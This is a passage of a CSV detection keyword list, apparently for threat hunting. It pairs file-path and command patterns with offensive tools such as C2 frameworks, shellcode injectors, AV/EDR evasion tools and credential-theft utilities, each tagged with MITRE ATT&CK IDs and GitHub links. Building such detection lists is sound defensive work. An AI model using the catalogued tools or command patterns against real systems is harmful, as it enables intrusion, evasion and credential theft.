+"*/ntlmtransport.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/ntlmutil.py*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" +"*/ntlmutil.py*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*/ntlmv1.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/ntlmv1.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ntp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ntp-monlist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/NtQuerySystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*/NtRemoteLoad.git*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*/NtRights/*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/NtSetSystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/Nuages_Cli*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*/nuagesAPI.js*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*/nxc --help*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc/parsers/ip.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc/parsers/nmap.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc-ubuntu-latest*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nysm bash*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm -dr socat TCP4-LISTEN*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm -r ssh *@*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm.bpf.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm.git*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/o365recon*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*/oab-parse/mspack.*.dll*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/obfs3/obfs3.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/obfuscated_scripts/*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/obfuscator/obfuscator.*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/octopus.asm*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*/Octopus.git*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*/octopusx64.asm*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*/OffensiveCSharp.git*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/OffensiveCSharp/*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/OffensiveNotion.git","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*/OffensiveNotion/agent*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*/OffensiveNotion/osxcross/target/bin*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*/OffensiveNotion/utils*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*/OG-Sadpanda/*","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" +"*/Oh365UserFinder*","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","468","84","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" +"*/OJ/gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/omg-payloads.git*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/omp2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/omp2-enum-targets.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/omron-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/On_Demand_C2/*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*/onedrive_user_enum*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" +"*/oneliner.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*/oneliner2.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*/onesixtyone/dict.txt*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"*/onex.git*","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/open_vas.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/openbullet.git*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*/OpenBullet2.git*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*/openflow-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/openlookup-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/openvas-otp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/openwebnet-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/opt/.exegol_aliases*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/opt/chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/opt/cobaltstrike/logs*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/opt/Covenant/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/opt/gocrack/files/engine*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/opt/gocrack/files/task*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/opt/icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/opt/implant/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 